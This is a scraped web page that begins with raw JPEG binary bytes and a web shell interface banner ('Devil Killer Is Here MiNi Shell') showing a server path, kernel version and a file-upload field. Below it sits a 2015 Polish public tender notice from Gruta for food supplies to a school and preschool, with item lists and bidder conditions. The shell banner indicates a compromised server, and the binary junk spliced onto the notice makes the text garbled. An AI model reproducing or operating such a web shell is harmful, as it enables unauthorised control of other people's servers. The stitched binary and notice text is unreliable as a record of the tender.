JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150814/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150814/209414-N-2015.html

<p class="kh_header"><b>Gruta: Dostawa artykułów żywnościowych dla Zespołu Szkół w Grucie i Przedszkola Samorządowego w Mełnie</b><br>
<b>Numer ogłoszenia: 209414 - 2015; data zamieszczenia: 14.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gminny Ośrodek Pomocy Społecznej , Gruta 244, 86-330 Gruta, woj. kujawsko-pomorskie, tel. 56 468 31 21, faks 56 468 31 88.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:www.bip.gruta.akcessnet.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych dla Zespołu Szkół w Grucie i Przedszkola Samorządowego w Mełnie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I
Dostawa oznaczona jako Część I świeże warzywa i owoce będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03221000-603220000-9

L.p.	Nazwa artykułu 	Jednostka miary	Ilość
1	Arbuz		
	Miesiąc VII-XI	kg	50
2.	Banany		
	Miesiąc I - III	kg	300
	Miesiąc IV - VII	kg	300
	Miesiąc IX - XII	kg	400
3.	Buraki ćwikłowe		
	Miesiąc I -III	kg	210
	Miesiąc IV - VII	kg	160
	Miesiąc VIII- XII	kg	230
4	Brzoskwinie		
	Miesiąc IV-VII	kg	45
	Miesiąc VIII-XII	kg	150
5.	Cebula		
	Miesiąc I-III	kg	130
	Miesiąc IV-VII	kg	60
	Miesiąc VIII-XII	kg	140
6.	Cukinia
	Miesiąc VIII-XII	kg	120
7.	Czosnek (główka)		
	Miesiąc I-III	szt.	40
	Miesiąc IV-VII	szt.	40
	Miesiąc VIII-XII	szt.	50
8.	Cytryny		
	Miesiąc I-III	kg	50
	Miesiąc IV-VII	kg	30
	Miesiąc VIII-XII	kg	50
9.	Gruszki		
	Miesiąc I-III	kg	70
	Miesiąc IV-VII	kg	70
	Miesiąc VIII-XII	kg	160
10.
	Jabłka			
	Miesiąc I-III	kg	500
	Miesiąc IV-VII	kg	500
	Miesiąc VIII-XII	kg	700
11.	Kabaczek
	Miesiąc VIII-XII	kg	120
12.	Kapusta kiszona		
	Miesiąc I-III	kg	170
	Miesiąc IV-VII	kg	150
	Miesiąc VIII-XII	kg	250
13.	Kapusta czerwona		
	Miesiąc I-III	kg	60
	Miesiąc IV-VII	kg	60
	Miesiąc VIII-XII	kg	70
14.	Kapusta biała		
	Miesiąc I - III	kg	350
	Miesiąc IV-VII	kg	250
	Miesiąc VIII-XII	kg	400
15.	Kalafior sezon		
	Miesiąc V-VII	szt.	100
	Miesiąc VIII-X	szt.	150
16.	Koper świeży		
	Miesiąc I-III	szt.	60
	Miesiąc IV-VI	szt.	70
	Miesiąc VII-XII	szt.	60
17.	Kapusta pekińska		
	Miesiąc I-III	szt.	100
	Miesiąc IV-VII	szt.	60
	Miesiąc VIII-XII	szt.	100
18.	Maliny		
	Miesiąc VII-IX	kg	20
19.	Marchew		
	Miesiąc I-III	kg	420
	Miesiąc IV-VII	kg	370
	Miesiąc VIII-XII	kg	490
20.	Mandarynki		
	Miesiąc IV-VI	kg	30
	Miesiąc IX-XII	kg	170
21.	Nektarynki		
	Miesiąc IV-VII	kg	100
	Miesiąc VIII-XII	kg	300
22.	Ogórek kiszony		
	Miesiąc I-III	kg	130
	Miesiąc IV-VII	kg	80
	Miesiąc VIII-XII	kg	210
23.	Ogórek świeży 		
	Miesiąc V-VII	kg	160
	Miesiąc VIII-X	kg	70
24.	Papryka czerwona		
	Miesiąc I-III	kg	30
	Miesiąc IV-VII	kg	30
	Miesiąc VIII-XII	kg	70
25.	Pory		
	Miesiąc I-III	kg	80
	Miesiąc IV-VII	kg	30
	Miesiąc VIII-XII	kg	120
26.	Pomarańcze		
	Miesiąc I-III	kg	70
	Miesiąc IV-VI	kg	20
	Miesiąc XI-XII	kg	120
27.	Pieczarki		
	Miesiąc I-III	kg	40
	Miesiąc IV-VI	kg	30
	Miesiąc IX-XII	kg	50
28.	Pomidory		
	Miesiąc I-III	kg	50
	Miesiąc IV-VII	kg	100
	Miesiąc VIII-XI	kg	100
29.	Pietruszka korzeń		
	Miesiąc I-III	kg	100
	Miesiąc IV-VII	kg	50
	Miesiąc IX-XII	kg	100
30.	Pietruszka zielona		
	Miesiąc IV-VII	szt.	70
	Miesiąc VIII-XII	szt.	70
31.	Rzodkiewka		
	Miesiąc I-III	szt.	50
	Miesiąc IV-VII	szt.	80
	Miesiąc IX-XII	szt.	30
32.	Seler korzeń		
	Miesiąc I-III	kg	160
	Miesiąc IV-VII	kg	100
	Miesiąc VIII-XII	kg	170
33.	Szczypior		
	Miesiąc I-III	szt.	40
	Miesiąc IV-VI	szt.	60
	Miesiąc VIII-XII	szt.	40
34.	Sałata lodowa (główka)		
	Miesiąc I-III	szt.	25
	Miesiąc IV-VI	szt.	45
	Miesiąc VIII-X	szt.	65
35.	Sałata zielona (główka)		
	Miesiąc IV-VII	szt.	45
	Miesiąc VIII-X	szt.	45
36.	Śliwy		
	Miesiąc VIII-IX	kg	200
37.	Truskawki		
	Miesiąc V-VII	kg	100
38.	Ziemniaki		
	Miesiąc I-III	kg	5000
	Miesiąc IV-VII	kg	5000
	Miesiąc VIII-XII	kg	6000


CZĘŚĆ II

Dostawa oznaczona jako Część II wyroby piekarskie będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15810000-9

L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.	Chleb orkiszowy (krojony 0,40 kg)	szt.	400
2.
	Chleb żytni (krojony 0,60 kg)	szt.	1400
3.	Chleb mieszany wieloziarnisty (0,50 kg)	szt.	170
4.
	Bułka pszenna (0,05 kg)	szt.	5000
5	Bułka z ziarnami (0,06 kg)	szt.	700
6.	Chleb pszenny (0,4 kg)	szt.	400
7.	Chleb razowy krojony ( 0,45 -0,50 kg) 	szt.	170
8.
	Bułka tarta	kg	160
9.
	Drożdżówka	szt.	200
10.
	Pączek	szt.	500

CZĘŚĆ III

Dostawa oznaczona jako Część III mrożone artykuły spożywcze będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 15330000-0, 15220000-6 

L.p.	Nazwa artykułu 	Jednostka miary	Ilość
1.
	Brokuł  	kg	80
2.	Brukselka	kg	25
3.	Fasolka szparagowa zielona	kg 	50
4.
	Groszek zielony 	kg	20
5.
	Kalafior 	kg	130
6.	Lody w kubeczkach 150 ml	szt.	200
7.
	Mieszanka warzywna                  7- składnikowa             	kg	300
8.	Mieszanka kompotowa 4 składnikowa	kg	250
9.	Maliny	kg	30
10.
	Filet rybny z morszczuka	kg	500
11.
	Filet rybny z dorsza  	kg	500
12.	Szpinak liście	kg	20
13.	Truskawka	kg	150
14.	Wiśnie 	kg	50
15.	Włoszczyzna słupki	kg	100

CZĘŚĆ IV
Dostawa oznaczona jako Część IV jaja kurze świeże gramaturze 63g- 73g będzie obejmować:
Kod Wspólnego Słownika Zamówień (CPV): 03142500-3


L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.
	Jaja kurze 63-73g	szt.	6000

CZĘŚĆ V
Dostawa oznaczona jako Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery:
Kod Wspólnego Słownika Zamówień (CPV): 15800000-6


L.p.	Nazwa artykułu	Jednostka miary	Ilość
1.	Ananas plastry w syropie - konserwowy 560-580 g	szt.	70
2.	Barszcz biały  instant 65 g	szt.	30
3.	Bazylia susz 20 g	szt.	20
4.	Budyń b/c 40 g	szt.	350
5.	Brzoskwinie w syropie - konserwowe 820 g	szt.	70
6.	Ciastka kruche	kg	70
7.
	Cukier kryształ  1 kg	kg	650
8.	Cukier puder 	kg	30
9.	Cukier wanilinowy 20 g	szt.	250
10.	Cynamon 20 g	szt.	5
11.	Czekoladki dla dzieci z mlecznym nadzieniem 100 g	szt.	250
12.	Drożdże 	kg	10
13.	Dżem niskosłodzony	kg	60
14.	Filety z makreli w oleju 170 g	szt.	50
15.	Filety z makreli  w sosie pomidorowym 170 g	szt.	50
16.	Fasola czerwona konserwowa 400g	szt.	30
17.	Fasola Jaś gruba 	kg	85
18.	Fasola drobna	kg	100
19.	Galaretka owocowa 75 g	szt.	60
20.	Groszek konserwowy	kg	20
21.
	Groch połówki	kg	120
22.	Herbata expresowa  ( torebka 2g)	kg	6
23.	Herbata expresowa   wieloowcowa (50 torebek po 2g)	szt.	40
24.	Herbata expresowa  zielona (25 torebek po 2g)	szt.	20
25.	Herbata expresowa miętowa (25 torebek po 2g)	szt.	25
26.	Herbata koperkowa (25 torebek po 2g)	szt.	30
27.
	Kukurydza konserwowa  	kg	30

28.	Kasza manna	kg	20
29.
	Kasza jęczmienna 	kg	200
30.
	Koncentrat pomidorowy (30%)	kg	170
31.	Kisiel (różne smaki) b/c 40g	szt.	200
32.	Kakao  ciemne100 % po 150 g	szt.	80
33.	Kawa inka  150 g	szt.	30
34	Kasza jaglana	kg	70
35.	Kasza gryczana	kg	50
36.
	Keczup łagodny  	kg	100
37.
	Koper susz 20 g	szt.	190
38.	Krem czekoladowy do smarowania	kg	10
39.
	Liść laurowy 20g	szt.	30
40.	Marmolada wieloowocowa	kg	8
41.	Mąka kukurydziana	kg	30
42.
	Mąka pszenna  typ 500 	kg	600
43.	Mąka pszenna typ 450 	kg	100
44.	Mąka ziemniaczana	kg	15
45.
	Majeranek 20g	szt.	75
46.	Musztarda 0,97 l	szt.	10
47.
	Makaron (różne kształty) 	kg	590
48.	Makaron (różne kształty) z mąki razowej	kg	50
49.
	Majonez 	kg	100
50.	Morele suszone	kg	5
51.	Miód naturalny	kg	18
52.
	Napój w kartoniku owocowy 0,21 l	szt.	6100
53.
	Olej uniwersalny 	litr	530
54.	Oliwa z oliwek	litr	30
55.	Ogórek konserwowy 	kg	50
56.	Otręby owsiane	kg	5
57.	Otręby pszenne	kg	5
58.	Proszek do pieczenia 30 g	szt.	30
59.
	Przyprawa w płynie do zup i sosów  1l	litr	60
60.
	Przyprawa warzywna do zup i sosów 	kg	100
61.
	Papryka mielona słodka 20g	szt.	80
62.
	Pieprz naturalny mielony 20g	szt.	200
63.
	Pietruszka nać, susz 10g	szt.	120
64.	Płatki kukurydziane 	kg	40
65.	Płatki czekoladowe z pełnym ziarnem 	kg	40
66.	Płatki owsiane	kg	10
67.
	Przyprawa do drobiu 20g	szt.	100
68.	Przyprawa do mięsa wieprzowego 20 g	szt.	20
69.	Przyprawa do piernika 20 g	szt. 	5
70.
	Ryż 	kg	250
71	Ryż brązowy 400 g ekspres	szt.	45
72.	Rodzynki 200 g	szt. 	20
73	Słonecznik łuskany	kg	5
74.
	Sok przecierowy  owocowo -warzywny 250 ml	szt.	1500
75	Sok przecierowy  owocowo -warzywny  0,9 l 	szt.	240
76.	Sok owocowy (100% wsad owocowy, bez dodatku cukru) różne smaki 	litr	300
77.
	Sól jodowana 1 kg	kg	160
78.	Śledź w oleju 170 g	szt.	40
79.	Tymianek susz 20 g	szt.	10
80.	Tuńczyk w sosie własnym puszka 170 g	szt.	30
81.	Ocet winny	litr	10
82.	Oregano 20 g	szt.	10
83.	Woda mineralna niegazowana 1,5 l (o ogólnej zawartości składników rozpuszczalnych nie mniej niż 600 mg/l	szt.	230
84.	Woda mineralna gazowana 1,5 l	szt.	60
85.
	Ziele angielskie 20g	szt.	40
86.	Zioła prowansalskie 20 g	szt.	30
87.	Żelatyna spożywcza 20 g	szt.	20
			
CZĘŚĆ VI
Dostawa oznaczona jako Część VI mięso świeże, wędliny i drób:
Kod Wspólnego Słownika Zamówień (CPV): 15100000-9

L.p.	Nazwa artykułu	Jednostka miary	Ilość

	I  Mięso świeże wieprzowe i wołowe		
1.
	Łopatka wieprzowa b/k kl. I	kg	400
2.	Antrykot wołowy kl. I	kg	20
3.
	Karkówka wieprzowa b/k kl. I	kg	80
4.	Szynka wieprzowa b/k  kl. I	kg	80
5.
	Schab wieprzowy  b/k kl. I	kg	75
6.
	Wątroba wieprzowa 	kg	80
7.	Biodrówka wieprzowa  kl. I	kg	40
8.	Mięso gulaszowe  wieprzowe kl.I	kg	220
9.	Mięso wołowe - łopatka b/k  kl. I	kg	60

	II Wędliny świeże		
1.
	Kiełbasa  śląska	kg	200
2.
	Kiełbasa wiejska	kg	100
3.	Szynka ogonówka parzona kl. I	kg	40
4.	Parówki paluszkowe drobiowe o zawartości ponad 60%  czystego mięsa drobiowego	kg	50
5.	Polędwica parzona	kg	35
6.	Pierś  drobiowa parzona	kg	40
7.	Krakowska parzona	kg	20
	
III Mięso drobiowe 	
Świeże	
			
1.
	Filet z piersi kurczaka 	kg	350
2.	Fiolet z piersi  indyka	kg	125
3.
	Kurczak 	kg	350
4.
5.	Podudzie z kurczaka	kg	450
6.
	Skrzydło z kurczaka	kg	200
7.	Udo z indyka trybowane b/k	kg	550
8.
	Wątróbka drobiowa	kg	90
9.	Żołądki drobiowe	kg	20
			
	CZĘŚĆ VII		
Dostawa oznaczona jako Część VII mleko i produkty mleczarskie:
Kod Wspólnego Słownika Zamówień (CPV): 15500000-3

L.p.	Nazwa artykułu 	Jednostka miary	Ilość
1.	Mleko krowie w kartonie  UHT 2% tł. op. 1 l 	litr	350 
2	Mleko krowie w folii lub butelce 2% tł. pasteryzowane	litr	2600
3.
	Mleko krowie w kartonie UHT  3,2% tł.  op. 1 l	litr	100
4.
	Jogurt owocowy 150 g (różne smaki)	szt.	3700
5.	Jogurt naturalny 400 g 	szt.	300
6.
	Masło ekstra 82% tł. 200 g	szt.	800
7.
	Ser żółty edamski	kg	85
8.	Serek twarogowy kremowy do smarowania	kg	14
9.	Ser topiony kremowy 100 g	szt.	180
10.	Ser biały twarogowy półtłusty	kg	400
11.
	Serek homogenizowany owocowy 150 g (różne smaki)	szt.	1800
12.
	Śmietana 12% tł.	litr	250
13.	Śmietana 30%tł. 0,5 l	szt.	40

1.	Dostawa będzie realizowana cyklicznie transportem Wykonawcy i na jego koszt do siedziby  Zespołu Szkół w Grucie, Gruta 70 oraz Przedszkola Samorządowego w Mełnie, Mełno 5. 
2.	Każdy z produktów powinien być dostarczony w wymaganych opakowaniach.
3.	 Cykliczne dostawy  będą realizowane następująco: 
-	Część I świeże warzywa i owoce - w pierwszym dniu od złożenia zamówienia (zamówienie będzie składane do godz. 10.00). od poniedziałku do piątku w godzinach od  7.00 do   8.00.
-	 Część II  wyroby piekarskie - codziennie w pierwszym dniu od złożenia zamówienia (zamówienie będzie składane do godz. 10.00) od poniedziałku do  piątku w godz. od 6.00   do  7.00.
-	 Część III  mrożone artykuły spożywcze - w  drugim dniu  od złożenia zamówienia 
od poniedziałku do piątku w godz. od 7.00 do 14.00.
-	Część IV jaja kurze świeże - w drugim dniu  od złożenia zamówienia od poniedziałku 
do piątku w godz. od 7.00 do 14.00.
-	Część V artykuły spożywcze sypkie, koncentraty, przyprawy i desery - w drugim     dniu od złożenia zamówienia od poniedziałku do piątku w godz. od 7.00 do 14.00.
-	 Część VI  mięso świeże, wędliny i drób - w pierwszym dniu  od złożenia zamówienia (zamówienie będzie składane do godz. 10.00)   od poniedziałku do piątku w godz. od 7.00 do 12.00.
-	Część VII  mleko i produkty mleczarskie -  w  pierwszym  dniu od złożenia zamówienia (zamówienie będzie składane do godz. 10.00) od poniedziałku do piątku  do godz.  7.00. do 8.00.
4.	Zamawiający powiadomi telefonicznie Wykonawcę, o każdej dostawie oraz wskaże zamawiane produkty z podaniem ilości. 
5.	 Produkty muszą być najwyższej jakości i spełniać być dostarczone w ich początkowym okresie gwarancji.  
6.	 W przypadkach, w których Zamawiający użył nazw własnych dla określenia walorów smakowych produktów, Zamawiający dopuszcza produkty o walorach smakowych takich samych lub wyższych. 
7.	 Wykonawca musi zachować odpowiednie warunki  transportu i przechowywania dostarczanego towaru zgodnie z wymogami HCCP. Każda dostawa towaru wymagającego załączenia handlowego dokumentu identyfikacyjnego musi posiadać taki dokument. 
8.	 Wykonawca użyczy nieodpłatnie  potrzebnych pojemników przy każdorazowej dostawie towaru do siedziby Zamawiającego na okres do następnej dostawy. 
9.	 Zamawiający zastrzega sobie prawo zamawiania mniejszej ilości towaru niż określona w ofercie. 
10.	Wykonawcy nie przysługują wobec Zamawiającego roszczenia odszkodowawcze z    tytułu zmniejszenia      zamówienia.
11.	 Zamawiający zastrzega  możliwość zamiany ilości poszczególnego asortymentu. 
12.	Wykonawca ma obowiązek uznania reklamacji jakości i ilości dostarczanego towaru i dostarczenia nowej partii do siedziby  Zamawiającego  w dniu złożenia reklamacji.
13.	Do składania zamówień Zamawiający upoważni wybranych  pracowników..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający dopuszcza udzielenie ofert uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych w ilości do 50% wartości zamówienia</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.00.00-9, 15.81.00.00-9, 15.33.00.00-0, 15.22.00.00-6, 03.14.25.00-3, 15.80.00.00-6, 15.10.00.00-9, 15.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie jest wymagane</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia warunku szczegółowego w tym zakresie. Wykonawca składa oświadczenia o spełnianiu warunków udziału w postępowaniu - załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że zostały wykonane lub są wykonywane należycie w okresie trzech lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jedną dostawę artykułów żywnościowych - wzór załącznik nr 3 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca oświadczy, że dysponuje odpowiednim potencjałem technicznym do realizacji zadania - wzór załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca oświadczy, osobami zdolnymi do wykonania zamówienia - wzór załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca oświadczy, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia - wzór załącznik nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

